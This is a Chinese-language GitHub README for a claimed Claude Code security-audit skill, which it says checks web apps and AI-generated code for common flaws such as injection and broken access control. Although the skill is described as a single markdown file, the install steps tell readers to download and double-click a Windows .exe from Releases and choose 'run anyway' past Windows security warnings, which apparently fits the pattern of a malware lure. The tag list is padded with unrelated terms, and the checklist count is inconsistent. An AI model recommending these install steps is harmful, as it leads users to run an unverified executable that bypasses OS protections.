Pold911/vibe-code-security-audit

# 🛡️ vibe-code-security-audit - 检查代码安全风险 [](https://github.com/Pold911/vibe-code-security-audit/releases) ## 🔽 下载 访问此页面进行下载：https://github.com/Pold911/vibe-code-security-audit/releases 在 Windows 上，打开最新版本并下载与您的系统匹配的文件。如果有多个文件，请选择以 `.exe` 结尾的文件或发布说明中列出的 Windows 包。 ## 🪟 在 Windows 上运行 1. 从 Releases 页面下载应用。 2. 打开您的“下载”文件夹。 3. 双击您下载的文件。 4. 如果 Windows 显示安全提示，且您信任此来源，请选择 **仍要运行**。 5. 按照屏幕上的步骤完成安装。 6. 从“开始”菜单或桌面上的快捷方式打开应用。 如果应用在命令行窗口中启动，请在您使用它时保持该窗口打开。 ## 📋 功能说明 `vibe-code-security-audit` 可帮助您检查 Web 应用和 AI 生成的代码中是否存在常见的安全问题。它侧重于可能导致数据泄露、账户访问问题以及不安全应用行为的实际问题。 使用它来审查： - Web 应用 - API 路由 - 服务器代码 - 前端代码 - AI 生成的代码 - 在分享前的小型脚本 它会查找在快速构建和早期版本中经常混入的错误类型。 ## 🔍 检查内容 此工具旨在审查代码中 20 个最常见的安全问题，包括： - 薄弱的输入验证 - 不安全的用户数据使用 - 失效的访问控制 - 缺失的身份验证检查 - 暴露的密钥 - 不安全的文件处理 - 跨站脚本风险 - SQL 注入风险 - 命令注入风险 - 不良的密码处理 - 薄弱的会话处理 - 不安全的重定向 - 糟糕的错误处理 - 缺失的速率限制 - 开放的 CORS 规则 - 不安全的 Headers - 过于宽泛的权限 - 不安全的反序列化 - 薄弱的 Token 处理 - 隐藏的调试路径 - 配置错误 ## ⚙️ 开始之前 请在您的 Windows PC 上准备好以下内容： - 近期版本的 Windows 10 或 Windows 11 - 互联网连接以下载发行版 - 准备一个要审查的 Web 应用、代码文件夹或 API 项目 - 在您的机器上设置好 Claude Code 如果您计划审查源代码，请将项目保存在您容易访问的文件夹中。 ## 🧩 在 Claude Code 中安装技能 此项目用作 Claude Code 的技能。 1. 从上面的链接下载发行版。 2. 在下载的文件中找到 `skill.md` 文件。 3. 将 `skill.md` 复制到您的 Claude Code 技能文件夹中。 4. 将其重命名为 `vibe-code-security-audit.md`。 典型的 Windows 路径： - `C:\Users\YourName\.claude\skills\` 如果该文件夹不存在，请先创建它。 ## 🛠️ 文件设置示例 将技能文件放在此处： - `C:\Users\YourName\.claude\skills\vibe-code-security-audit.md` 之后，重启 Claude Code 以便加载新技能。 ## 🚀 如何使用 让 Claude 审查您的代码是否存在安全问题。 示例提示词： - 审计我的应用是否存在安全漏洞 - 我的代码安全吗？ - 对此 API 运行安全审查 - 检查是否存在 OWASP 问题 - 加固我的 Express 应用 - 审查此登录流程是否存在风险 - 在此项目中查找安全问题 您也可以直接粘贴代码或指向您项目中的某个文件夹。 ## 🧪 获取最佳结果 为了获得有用的审查结果，请为 Claude 提供清晰的背景信息： - 应用的功能是什么 - 哪些部分处理登录或用户数据 - 应用是否存储密钥 - 您使用的是哪个框架 - 您认为哪些区域存在潜在风险 提供良好的输入信息有助于审查将重点放在代码的正确部分。 ## 📁 示例用例 您可以将此技能用于： - 带有登录表单的 Node.js API - 发送表单数据的 React 应用 - 包含文件上传的 Express 应用 - 包含用户账户的 Python 应用 - 快速构建生成的 AI 代码 - 发布前的小型内部工具 当您希望在测试或发布前进行快速审查时，它非常有用。 ## 🔧 Windows 上的必备条件 为了保持操作简单，请使用： - 具有用户文件夹写入权限的标准 Windows 账户 - 足够的可用空间来存储发行版文件 - 如果您想检查 `skill.md`，请准备一个文本编辑器 - 已安装并登录的 Claude Code 如果您使用的是工作电脑，请确保您可以在用户配置文件中保存文件。 ## 🗂️ 文件夹布局 简单的设置如下所示： - `Downloads\` - `C:\Users\YourName\.claude\skills\` - `YourProjectFolder\` 将技能文件保留在 Claude 技能文件夹中，并将您的项目文件保留在单独的文件夹中。 ## ❓ 常见问题 ### 我需要编程知识吗？ 不需要。您只需下载发行版，复制一个文件，然后让 Claude 审查您的代码即可。 ### 我可以将其用于任何应用吗？ 它最适合 Web 应用、API 以及处理用户数据的代码。 ### 它能取代完整的安全审查吗？ 不能。它可以帮助您尽早发现常见问题，并为您提供有力的初步检查。 ### 我可以将其用于 AI 生成的代码吗？ 是的。它非常适合快速编写且需要安全检查的代码。 ## 📌 致谢 清单来源于 [@hartdrawss](https://x.com/hartdrawss/status/2039998901176897860) ## 📥 直接下载 访问此页面下载最新版本：https://github.com/Pold911/vibe-code-security-audit/releases ## 🪟 Windows 快速步骤 1. 打开 Releases 页面。 2. 下载最新的 Windows 文件。 3. 将 `skill.md` 复制到 `C:\Users\YourName\.claude\skills\` 4. 重启 Claude Code。 5. 让 Claude 审计您的代码

标签：AI安全, API安全, C2, Chat Copilot, CISA项目, Claude Code, CORS配置, GitHub Advanced Security, HTTP安全头, JSON输出, SQL注入检测, URL发现, Web安全, XSS检测, 不安全反序列化, 代码安全, 会话管理, 前端安全, 后端安全, 命令注入, 大模型代码审查, 安全加固, 安全检测, 开发安全, 弱密码检查, 漏洞枚举, 白盒测试, 蓝队分析, 访问控制缺陷, 跨站脚本攻击, 身份验证缺陷, 错误基检测, 防御加固, 静态代码分析, 风险检查